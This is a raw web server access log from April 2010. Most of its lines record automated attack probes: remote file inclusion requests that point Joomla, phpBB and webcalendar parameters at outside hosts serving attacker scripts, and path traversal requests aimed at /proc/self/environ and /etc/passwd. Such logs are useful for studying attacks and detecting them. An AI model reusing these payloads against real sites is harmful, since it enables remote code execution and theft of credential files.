125.248.150.84 - - [28/Apr/2010:15:02:52 -0500] "GET //kalasd2006/board/bbs//delete_comment.php?board_skin_path=http://www.firststreetgalleries.com/.cok/P1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
125.248.150.84 - - [28/Apr/2010:15:02:52 -0500] "GET /logs//kalasd2006/board/bbs//delete_comment.php?board_skin_path=http://www.firststreetgalleries.com/.cok/P1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
125.248.150.84 - - [28/Apr/2010:15:02:58 -0500] "GET /logs//kalasd2006/board/bbs//delete_comment.php?board_skin_path=http://www.firststreetgalleries.com/.cok/P1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
125.248.150.84 - - [28/Apr/2010:15:02:58 -0500] "GET //kalasd2006/board/bbs//delete_comment.php?board_skin_path=http://www.firststreetgalleries.com/.cok/P1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
125.248.150.84 - - [28/Apr/2010:15:02:59 -0500] "GET /logs/access_log.1264636800//kalasd2006/board/bbs//delete_comment.php?board_skin_path=http://www.firststreetgalleries.com/.cok/P1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
125.248.150.84 - - [28/Apr/2010:15:03:01 -0500] "GET //kalasd2006/board/bbs//delete_comment.php?board_skin_path=http://www.firststreetgalleries.com/.cok/P1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
125.248.150.84 - - [28/Apr/2010:15:03:01 -0500] "GET /logs//kalasd2006/board/bbs//delete_comment.php?board_skin_path=http://www.firststreetgalleries.com/.cok/P1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
125.248.150.84 - - [28/Apr/2010:15:03:02 -0500] "GET /logs/access_log.1264636800//kalasd2006/board/bbs//delete_comment.php?board_skin_path=http://www.firststreetgalleries.com/.cok/P1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
64.15.156.83 - - [28/Apr/2010:15:03:44 -0500] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
64.15.156.83 - - [28/Apr/2010:15:03:44 -0500] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
64.15.156.83 - - [28/Apr/2010:15:03:44 -0500] "GET /logs/access_log.1219708800%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
64.15.156.83 - - [28/Apr/2010:15:04:41 -0500] "GET /logs/access_log.1212969600//phpsecurityadmin/include/logout.php?PSA_PATH=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
64.15.156.83 - - [28/Apr/2010:15:04:41 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
64.15.156.83 - - [28/Apr/2010:15:04:41 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
64.15.156.83 - - [28/Apr/2010:15:05:44 -0500] "GET /logs/access_log.1219708800/components/com_colorlab/admin.color.php?mosConfig_live_site=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
64.15.156.83 - - [28/Apr/2010:15:05:52 -0500] "GET /logs/access_log.1219708800%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
64.15.156.83 - - [28/Apr/2010:15:07:41 -0500] "GET /logs/access_log.1212969600%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://n1ngas.hdfree.com.br/fx29id.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
220.232.195.131 - - [28/Apr/2010:15:07:42 -0500] "GET /logs/index.php?option=com_sbsfile&controller=./../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""-"
220.232.195.131 - - [28/Apr/2010:15:07:42 -0500] "GET /logs/index.php?option=com_sbsfile&controller=./../../../../../../../proc/self/environ HTTP/1.1" 404 298 "-""-"
220.232.195.131 - - [28/Apr/2010:15:07:44 -0500] "GET /index.php?option=com_sbsfile&controller=./../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""-"
220.232.195.131 - - [28/Apr/2010:15:07:45 -0500] "GET /index.php?option=com_sbsfile&controller=./../../../../../../../proc/self/environ HTTP/1.1" 404 293 "-""-"
74.52.35.234 - - [28/Apr/2010:15:08:33 -0500] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
207.46.199.40 - - [28/Apr/2010:15:09:55 -0500] "GET /logs/access_log.1200960000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
110.45.146.38 - - [28/Apr/2010:15:10:25 -0500] "GET //components/com_forum/download.php?phpbb_root_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
110.45.146.38 - - [28/Apr/2010:15:10:25 -0500] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
110.45.146.38 - - [28/Apr/2010:15:10:27 -0500] "GET /logs/access_log.1220054400//components/com_forum/download.php?phpbb_root_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
67.220.215.34 - - [28/Apr/2010:15:10:47 -0500] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
87.250.255.243 - - [28/Apr/2010:15:11:03 -0500] "GET /logs/access_log.1270598400 HTTP/1.1" 200 577895 "-""Yandex/1.01.001 (compatible; Win16; I)"
64.34.165.224 - - [28/Apr/2010:15:11:27 -0500] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
67.205.1.227 - - [28/Apr/2010:15:12:42 -0500] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
67.205.1.227 - - [28/Apr/2010:15:12:44 -0500] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
67.205.1.227 - - [28/Apr/2010:15:12:44 -0500] "GET /logs/access_log.1268956800/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
67.205.1.227 - - [28/Apr/2010:15:12:44 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
67.205.1.227 - - [28/Apr/2010:15:12:45 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
67.205.1.227 - - [28/Apr/2010:15:12:45 -0500] "GET /logs/access_log.1268956800/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
67.205.1.227 - - [28/Apr/2010:15:12:53 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
67.205.1.227 - - [28/Apr/2010:15:12:53 -0500] "GET /logs/access_log.1268956800/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
67.205.1.227 - - [28/Apr/2010:15:12:53 -0500] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
67.205.1.227 - - [28/Apr/2010:15:13:01 -0500] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
67.205.1.227 - - [28/Apr/2010:15:13:01 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
67.205.1.227 - - [28/Apr/2010:15:13:01 -0500] "GET /logs/access_log.1268956800/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
67.205.1.227 - - [28/Apr/2010:15:13:22 -0500] "GET /logs/access_log.1268956800%20%20/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
67.220.215.34 - - [28/Apr/2010:15:14:50 -0500] "GET /logs/access_log.1268265600/?option=com_rwcards&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
67.220.215.34 - - [28/Apr/2010:15:14:50 -0500] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
67.220.215.34 - - [28/Apr/2010:15:14:50 -0500] "GET /logs/?option=com_rwcards&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3472 "-""libwww-perl/5.834"
110.45.146.38 - - [28/Apr/2010:15:14:58 -0500] "GET //components/com_forum/download.php?phpbb_root_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
110.45.146.38 - - [28/Apr/2010:15:14:58 -0500] "GET /logs/access_log.1219708800%20%20//components/com_forum/download.php?phpbb_root_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
110.45.146.38 - - [28/Apr/2010:15:14:58 -0500] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
110.45.146.38 - - [28/Apr/2010:15:15:11 -0500] "GET /logs/access_log.1220054400%20%20//components/com_forum/download.php?phpbb_root_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
67.195.112.180 - - [28/Apr/2010:15:15:22 -0500] "GET /logs/access_log.1267574400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.52.35.234 - - [28/Apr/2010:15:15:50 -0500] "GET /logs/access_log.1219363200/?option=com_rwcards&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
74.52.35.234 - - [28/Apr/2010:15:15:50 -0500] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
74.52.35.234 - - [28/Apr/2010:15:15:50 -0500] "GET /logs/?option=com_rwcards&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3472 "-""libwww-perl/5.834"
67.220.215.34 - - [28/Apr/2010:15:17:10 -0500] "GET /logs/access_log.1219363200/?option=com_rwcards&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
67.220.215.34 - - [28/Apr/2010:15:17:10 -0500] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
67.220.215.34 - - [28/Apr/2010:15:17:10 -0500] "GET /logs/?option=com_rwcards&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3472 "-""libwww-perl/5.834"
67.220.215.34 - - [28/Apr/2010:15:17:22 -0500] "GET /logs/access_log.1219363200/?option=com_rwcards&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
67.220.215.34 - - [28/Apr/2010:15:19:56 -0500] "GET /logs/access_log.1268611200/?option=com_rwcards&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
64.34.165.224 - - [28/Apr/2010:15:21:04 -0500] "GET /logs/access_log.1237852800/?option=com_rwcards&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
64.34.165.224 - - [28/Apr/2010:15:21:04 -0500] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
64.34.165.224 - - [28/Apr/2010:15:21:04 -0500] "GET /logs/?option=com_rwcards&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3472 "-""libwww-perl/5.834"
67.205.1.227 - - [28/Apr/2010:15:21:58 -0500] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
67.205.1.227 - - [28/Apr/2010:15:21:58 -0500] "GET /logs/access_log.1268956800/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
67.205.1.227 - - [28/Apr/2010:15:21:58 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
207.46.13.84 - - [28/Apr/2010:15:22:24 -0500] "GET /logs/access_log.1189468800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.205.1.227 - - [28/Apr/2010:15:22:25 -0500] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
67.205.1.227 - - [28/Apr/2010:15:22:25 -0500] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
67.205.1.227 - - [28/Apr/2010:15:22:25 -0500] "GET /logs/access_log.1268956800/administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
207.46.204.183 - - [28/Apr/2010:15:22:55 -0500] "GET /logs/access_log.1181865600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.52.35.234 - - [28/Apr/2010:15:24:57 -0500] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
115.124.119.4 - - [28/Apr/2010:15:25:14 -0500] "GET //webcalendar//tools/send_reminders.php?noSet=0&includedir=http://www.firststreetgalleries.com/.cok/P1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
115.124.119.4 - - [28/Apr/2010:15:25:14 -0500] "GET /logs//webcalendar//tools/send_reminders.php?noSet=0&includedir=http://www.firststreetgalleries.com/.cok/P1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
115.124.119.4 - - [28/Apr/2010:15:25:14 -0500] "GET /logs/access_log.1212969600%20%20//webcalendar//tools/send_reminders.php?noSet=0&includedir=http://www.firststreetgalleries.com/.cok/P1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
74.52.35.234 - - [28/Apr/2010:15:26:42 -0500] "GET /logs/access_log.1219363200/?option=com_rwcards&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
74.52.35.234 - - [28/Apr/2010:15:26:42 -0500] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
74.52.35.234 - - [28/Apr/2010:15:26:42 -0500] "GET /logs/?option=com_rwcards&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3472 "-""libwww-perl/5.834"
74.52.35.234 - - [28/Apr/2010:15:27:54 -0500] "GET /logs/access_log.1219363200/?option=com_rwcards&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
74.52.35.234 - - [28/Apr/2010:15:27:54 -0500] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
74.52.35.234 - - [28/Apr/2010:15:27:54 -0500] "GET /logs/?option=com_rwcards&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3472 "-""libwww-perl/5.834"
62.128.135.38 - - [28/Apr/2010:15:34:49 -0500] "GET //index.php?option=com_rwcards&view=rwcards&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""-"
62.128.135.38 - - [28/Apr/2010:15:34:49 -0500] "GET //index.php?option=com_rwcards&view=rwcards&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 294 "-""-"
74.52.35.234 - - [28/Apr/2010:15:34:49 -0500] "GET /logs/access_log.1211068800/?option=com_rwcards&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
72.207.248.107 - - [28/Apr/2010:15:38:31 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://12oz.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
72.207.248.107 - - [28/Apr/2010:15:38:31 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://12oz.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
72.207.248.107 - - [28/Apr/2010:15:38:31 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://12oz.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
72.207.248.107 - - [28/Apr/2010:15:38:31 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://12oz.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
72.207.248.107 - - [28/Apr/2010:15:38:31 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://12oz.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
72.207.248.107 - - [28/Apr/2010:15:38:31 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://12oz.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
72.207.248.107 - - [28/Apr/2010:15:38:31 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://12oz.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
72.207.248.107 - - [28/Apr/2010:15:38:31 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://12oz.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
72.207.248.107 - - [28/Apr/2010:15:38:31 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://12oz.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
72.207.248.107 - - [28/Apr/2010:15:38:31 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://12oz.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
72.207.248.107 - - [28/Apr/2010:15:38:31 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://12oz.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
72.207.248.107 - - [28/Apr/2010:15:38:31 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://12oz.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
72.207.248.107 - - [28/Apr/2010:15:38:31 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://12oz.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
72.207.248.107 - - [28/Apr/2010:15:38:31 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://12oz.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
72.207.248.107 - - [28/Apr/2010:15:38:32 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://12oz.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
72.207.248.107 - - [28/Apr/2010:15:38:32 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://12oz.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
72.207.248.107 - - [28/Apr/2010:15:38:32 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://12oz.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
72.207.248.107 - - [28/Apr/2010:15:38:32 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://12oz.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
72.207.248.107 - - [28/Apr/2010:15:38:32 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://12oz.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
72.207.248.107 - - [28/Apr/2010:15:38:32 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://12oz.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
72.207.248.107 - - [28/Apr/2010:15:38:32 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://12oz.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
72.207.248.107 - - [28/Apr/2010:15:38:32 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://12oz.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
72.207.248.107 - - [28/Apr/2010:15:38:32 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://12oz.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
72.207.248.107 - - [28/Apr/2010:15:38:32 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://12oz.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
72.207.248.107 - - [28/Apr/2010:15:38:32 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://12oz.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
72.207.248.107 - - [28/Apr/2010:15:38:32 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://12oz.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
72.207.248.107 - - [28/Apr/2010:15:38:32 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://12oz.com/forum/showthread.php?t=92113&page=662""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729)"
74.52.35.234 - - [28/Apr/2010:15:39:47 -0500] "GET /logs/access_log.1268611200/?option=com_rwcards&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
87.250.255.243 - - [28/Apr/2010:15:40:33 -0500] "GET /logs/access_log.1270857600 HTTP/1.1" 200 549473 "-""Yandex/1.01.001 (compatible; Win16; I)"
115.124.119.4 - - [28/Apr/2010:15:41:51 -0500] "GET /logs/access_log.1212969600//webcalendar//tools/send_reminders.php?noSet=0&includedir=http://www.firststreetgalleries.com/.cok/P1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
65.55.106.229 - - [28/Apr/2010:15:44:28 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
115.124.119.4 - - [28/Apr/2010:15:52:50 -0500] "GET /logs/access_log.1268956800//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.firststreetgalleries.com/.cok/P1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
115.124.119.4 - - [28/Apr/2010:15:52:50 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.firststreetgalleries.com/.cok/P1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
115.124.119.4 - - [28/Apr/2010:15:52:51 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.firststreetgalleries.com/.cok/P1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
115.124.119.4 - - [28/Apr/2010:15:52:57 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.firststreetgalleries.com/.cok/P1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
